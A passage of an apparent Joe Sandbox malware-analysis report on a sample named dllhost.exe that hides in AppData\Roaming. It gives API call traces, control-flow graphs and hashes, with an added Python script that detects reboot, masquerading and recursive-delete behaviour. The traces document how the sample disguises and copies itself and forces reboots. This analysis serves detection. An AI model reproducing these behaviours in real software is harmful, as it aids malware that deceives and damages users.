                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403729
                                                                              • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
                                                                              • CopyFileW.KERNEL32 ref: 00403797
                                                                              • CloseHandle.KERNEL32(00000000), ref: 004037C4
                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
                                                                              • ExitProcess.KERNEL32 ref: 0040387A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\dllhost.exe$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                              • API String ID: 2488574733-3539436381
                                                                              • Opcode ID: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                                                              • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
                                                                              • Opcode Fuzzy Hash: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                                                              • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E

                                                                              Control-flow Graph of the function at 0040595A (the rendered graph, which colours basic blocks as Executed / Not Executed, is not reproduced; the block ranges, calls and edges emitted by the plugin follow):
                                                                              control_flow_graph 498 40595a-405980 call 405c25 501 405982-405994 DeleteFileW 498->501 502 405999-4059a0 498->502 503 405b16-405b1a 501->503 504 4059a2-4059a4 502->504 505 4059b3-4059c3 call 40624c 502->505 506 405ac4-405ac9 504->506 507 4059aa-4059ad 504->507 513 4059d2-4059d3 call 405b69 505->513 514 4059c5-4059d0 lstrcatW 505->514 506->503 509 405acb-405ace 506->509 507->505 507->506 511 405ad0-405ad6 509->511 512 405ad8-405ae0 call 40658f 509->512 511->503 512->503 522 405ae2-405af6 call 405b1d call 405912 512->522 515 4059d8-4059dc 513->515 514->515 518 4059e8-4059ee lstrcatW 515->518 519 4059de-4059e6 515->519 521 4059f3-405a0f lstrlenW FindFirstFileW 518->521 519->518 519->521 523 405a15-405a1d 521->523 524 405ab9-405abd 521->524 538 405af8-405afb 522->538 539 405b0e-405b11 call 4052b0 522->539 527 405a3d-405a51 call 40624c 523->527 528 405a1f-405a27 523->528 524->506 526 405abf 524->526 526->506 540 405a53-405a5b 527->540 541 405a68-405a73 call 405912 527->541 530 405a29-405a31 528->530 531 405a9c-405aac FindNextFileW 528->531 530->527 534 405a33-405a3b 530->534 531->523 537 405ab2-405ab3 FindClose 531->537 534->527 534->531 537->524 538->511 544 405afd-405b0c call 4052b0 call 406012 538->544 539->503 540->531 545 405a5d-405a66 call 40595a 540->545 550 405a94-405a97 call 4052b0 541->550 551 405a75-405a78 541->551 544->503 545->531 550->531 554 405a7a-405a8a call 4052b0 call 406012 551->554 555 405a8c-405a92 551->555 554->531 555->531
                                                                              APIs
                                                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 00405983
                                                                              • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 004059CB
                                                                              • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 004059EE
                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 004059F4
                                                                              • FindFirstFileW.KERNELBASE(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 00405A04
                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
                                                                              • FindClose.KERNEL32(00000000), ref: 00405AB3
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405968
                                                                              • \*.*, xrefs: 004059C5
                                                                              • "C:\Users\user\AppData\Roaming\dllhost.exe" , xrefs: 0040595A
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                              • API String ID: 2035342205-201830484
                                                                              • Opcode ID: a726ba824d0f7a77de256695d031786f567400a106043d2ce3abae66fd9d1b52
                                                                              • Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
                                                                              • Opcode Fuzzy Hash: a726ba824d0f7a77de256695d031786f567400a106043d2ce3abae66fd9d1b52
                                                                              • Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE
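The two function listings above (the self-copy and reboot routine whose calls run from 004035D4 to 0040387A, and the wildcard directory walk at 0040595A, both carrying the NSIS Error and ~nsu strings of the NSIS installer stub) are the kind of raw API trace an analyst reduces to behaviours by hand. The following Python script is an added example written for this page, not code from Joe Sandbox or from the sample. It parses the report's "• Api.MODULE(args), ref: ADDR" lines (including the "Part of subcall function" variant) and applies three rules to the calls of one function: SeShutdownPrivilege followed by ExitWindowsEx, a file carrying a Windows system-binary name under a user-writable AppData path, and a \*.* FindFirstFileW/FindNextFileW walk combined with DeleteFileW. The embedded listing is a constructed subset of the lines above; the SYSTEM_BINARY_NAMES set and the user-profile path pattern are assumptions of the example, and the shutdown rule reports a capability (here the installer's ordinary reboot path), not a verdict.

```python
"""Triage helper for Joe Sandbox IDA-plugin API listings.

Added example, not part of the report or of Joe Sandbox: it parses lines of
the form '• Api.MODULE(arg,arg,...), ref: ADDR' (subcall variant included)
and applies a few behaviour rules to the calls of one function.
"""
import re

# One API line of the listing. The argument list is optional
# ("ExitProcess.KERNEL32 ref: 004036D4" has none).
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# A path under a user profile that the user can write to (assumption: the
# sandbox user is "user"; the pattern accepts any profile name).
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\(?:Roaming|Local)\\", re.IGNORECASE)
# Illustrative set of Windows system binary names (assumption, not from the report).
SYSTEM_BINARY_NAMES = {"dllhost.exe", "svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe"}
# ExitWindowsEx uFlags bits from winuser.h.
EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE",
             0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}

# Constructed sample: a subset of the lines from the two function listings above.
SAMPLE_LISTING = r"""
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
• DeleteFileW.KERNEL32(1033,?,00000006,00000008,0000000A), ref: 004035E8
  • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
• ExitProcess.KERNEL32 ref: 004036D4
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036E7
• CopyFileW.KERNEL32 ref: 00403797
• GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
• OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
• AdjustTokenPrivileges.ADVAPI32 ref: 00403832
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
• DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 00405983
• lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 004059CB
• FindFirstFileW.KERNELBASE(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 00405A04
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
• FindClose.KERNEL32(00000000), ref: 00405AB3
"""


def parse_calls(text):
    """Return one dict per API line: api, module, args (quotes stripped), ref, subcall."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [a.strip().strip('"') for a in raw.split(",")] if raw else []
        calls.append({"api": m.group("api"), "module": m.group("mod"), "args": args,
                      "ref": m.group("ref").upper(), "subcall": m.group("sub")})
    return calls


def decode_ewx(flags):
    """Name the ExitWindowsEx uFlags bits; no bit set means EWX_LOGOFF (0)."""
    names = [n for bit, n in EWX_FLAGS.items() if flags & bit]
    return "|".join(names) if names else "EWX_LOGOFF"


def triage(calls):
    """Apply behaviour rules to the parsed calls of one function; return findings."""
    findings = []
    apis = {c["api"] for c in calls}
    # Rule 1: SeShutdownPrivilege is looked up and ExitWindowsEx is called, so the
    # code can reboot or shut down the host. Reported as a capability only.
    privs = {a for c in calls if c["api"] == "LookupPrivilegeValueW" for a in c["args"]}
    exits = [c for c in calls if c["api"] == "ExitWindowsEx"]
    if "SeShutdownPrivilege" in privs and exits:
        try:
            flags = decode_ewx(int(exits[0]["args"][0], 16))
        except (IndexError, ValueError):
            flags = "?"
        findings.append(f"shutdown capability: SeShutdownPrivilege + ExitWindowsEx({flags}) at {exits[0]['ref']}")
    # Rule 2: a file named like a Windows system binary under a user-writable path.
    seen = set()
    for c in calls:
        for a in c["args"]:
            name = a.rsplit("\\", 1)[-1].lower()
            if USER_WRITABLE.search(a) and name in SYSTEM_BINARY_NAMES and a not in seen:
                seen.add(a)
                findings.append(f"system binary name in user-writable path: {a} ({c['api']} at {c['ref']})")
    # Rule 3: a \*.* directory walk combined with DeleteFileW is a recursive-delete routine.
    wildcard = any(a == r"\*.*" for c in calls for a in c["args"])
    if wildcard and {"FindFirstFileW", "FindNextFileW", "DeleteFileW"} <= apis:
        findings.append("recursive delete: FindFirstFileW/FindNextFileW over \\*.* combined with DeleteFileW")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_calls(SAMPLE_LISTING)):
        print(finding)
```

Run against the embedded listing, the script reports the reboot capability (ExitWindowsEx(00000002, 80040002) decodes to EWX_REBOOT with reason SHTDN_REASON_FLAG_PLANNED | SHTDN_REASON_MAJOR_APPLICATION | SHTDN_REASON_MINOR_INSTALLATION, a planned installer reboot), the dllhost.exe copy under AppData\Roaming, and the recursive-delete routine. To use it on a full report, paste the API block of each function into SAMPLE_LISTING or read it from a file; the rules deliberately key on argument strings rather than on API names alone, because DeleteFileW or FindFirstFileW on their own are unremarkable.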
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                                              • Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
                                                                              • Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                                              • Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405C6E,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,7570D4C4,0040597A,?,C:\Users\user\AppData\Local\Temp\,7570D4C4), ref: 0040659A
                                                                              • FindClose.KERNELBASE(00000000), ref: 004065A6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID: 8gB
                                                                              • API String ID: 2295610775-1733800166
                                                                              • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                              • Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
                                                                              • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                              • Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402871
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FileFindFirst
                                                                              • String ID:
                                                                              • API String ID: 1974802433-0
                                                                              • Opcode ID: e1c3063bf10c5ef6748f1a2a306b49316e07f1283b06f73373375dfd7fee89f9
                                                                              • Instruction ID: 457e94eee93b26a2a7a920d72ffedce9eee0ef57ab85e6e0c0e07cda1b0ec514
                                                                              • Opcode Fuzzy Hash: e1c3063bf10c5ef6748f1a2a306b49316e07f1283b06f73373375dfd7fee89f9
                                                                              • Instruction Fuzzy Hash: 72F08271A04104EFD710EBA4DD49AADB378EF00314F2045BBF911F21D1D7B44E409B2A

                                                                              Control-flow Graph of the function at 004053EF (the rendered graph, which colours basic blocks as Executed / Not Executed, is not reproduced; the block ranges, calls and edges emitted by the plugin follow):
                                                                              control_flow_graph 139 4053ef-40540a 140 405410-4054d7 GetDlgItem * 3 call 404216 call 404b4d GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 405599-4055a0 139->141 159 4054f5-4054f8 140->159 160 4054d9-4054f3 SendMessageW * 2 140->160 143 4055a2-4055c4 GetDlgItem CreateThread CloseHandle 141->143 144 4055ca-4055d7 141->144 143->144 145 4055f5-4055ff 144->145 146 4055d9-4055df 144->146 150 405601-405607 145->150 151 405655-405659 145->151 148 4055e1-4055f0 ShowWindow * 2 call 404216 146->148 149 40561a-405623 call 404248 146->149 148->145 163 405628-40562c 149->163 155 405609-405615 call 4041ba 150->155 156 40562f-40563f ShowWindow 150->156 151->149 153 40565b-405661 151->153 153->149 161 405663-405676 SendMessageW 153->161 155->149 164 405641-40564a call 4052b0 156->164 165 40564f-405650 call 4041ba 156->165 166 405508-40551f call 4041e1 159->166 167 4054fa-405506 SendMessageW 159->167 160->159 168 405778-40577a 161->168 169 40567c-4056a7 CreatePopupMenu call 40626e AppendMenuW 161->169 164->165 165->151 178 405521-405535 ShowWindow 166->178 179 405555-405576 GetDlgItem SendMessageW 166->179 167->166 168->163 176 4056a9-4056b9 GetWindowRect 169->176 177 4056bc-4056d1 TrackPopupMenu 169->177 176->177 177->168 180 4056d7-4056ee 177->180 181 405544 178->181 182 405537-405542 ShowWindow 178->182 179->168 183 40557c-405594 SendMessageW * 2 179->183 184 4056f3-40570e SendMessageW 180->184 185 40554a-405550 call 404216 181->185 182->185 183->168 184->184 186 405710-405733 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 405735-40575c SendMessageW 186->188 188->188 189 40575e-405772 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->168
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040544D
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040545C
                                                                              • GetClientRect.USER32(?,?,00000004), ref: 00405499
                                                                              • GetSystemMetrics.USER32(00000002), ref: 004054A0
                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
                                                                              • ShowWindow.USER32(00000000,?), ref: 00405528
                                                                              • ShowWindow.USER32(?,00000008), ref: 0040553C
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040555D
                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040546B
                                                                                • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004055AF
                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005383,00000000), ref: 004055BD
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 004055C4
                                                                              • ShowWindow.USER32(00000000), ref: 004055E8
                                                                              • ShowWindow.USER32(?,00000008), ref: 004055ED
                                                                              • ShowWindow.USER32(00000008), ref: 00405637
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
                                                                              • CreatePopupMenu.USER32 ref: 0040567C
                                                                              • AppendMenuW.USER32 ref: 00405690
                                                                              • GetWindowRect.USER32(?,?), ref: 004056B0
                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
                                                                              • OpenClipboard.USER32(00000000), ref: 00405711
                                                                              • EmptyClipboard.USER32 ref: 00405717
                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0040572D
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405761
                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
                                                                              • CloseClipboard.USER32 ref: 00405772
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                              • String ID: L)Z${$6B
                                                                              • API String ID: 590372296-3746735139
                                                                              • Opcode ID: 44484b69dfab64248b971870e4f1fa2f017bd6e205110b4c47fe376a49196580
                                                                              • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
                                                                              • Opcode Fuzzy Hash: 44484b69dfab64248b971870e4f1fa2f017bd6e205110b4c47fe376a49196580
                                                                              • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68

                                                                              Control-flow Graph
